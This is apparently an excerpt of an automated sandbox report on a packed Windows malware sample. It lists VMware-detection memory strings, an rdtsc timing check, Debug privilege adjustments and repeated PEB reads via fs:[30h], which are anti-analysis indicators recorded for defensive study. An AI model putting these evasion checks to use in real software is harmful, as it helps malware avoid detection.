            Source: explorer.exe, 0000000E.00000000.455182068.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: explorer.exe, 0000000E.00000000.486557090.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
            Source: explorer.exe, 0000000E.00000000.454651139.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
            Source: explorer.exe, 0000000E.00000000.415035418.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD5BA5 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BDF1B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BDF1B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3C9BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3C9BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B399BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B161A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B161A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B161A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B161A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B869A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08190 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34190 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0519E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0519E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCA189 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCA189 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B031E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B941E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD89E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2D1EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC19D8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1C1C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03138 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B24120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B10100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B10100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B10100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8966 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCE962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1951 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0395E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0395E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B378A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B490AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128AE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03880 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03880 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B83884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B83884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC60F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128FD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128FD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B128FD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B088E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B040E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B058EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B078D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B078D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B078D6 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B9B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B070C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B070C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC18CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB0C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB0C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34020 mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
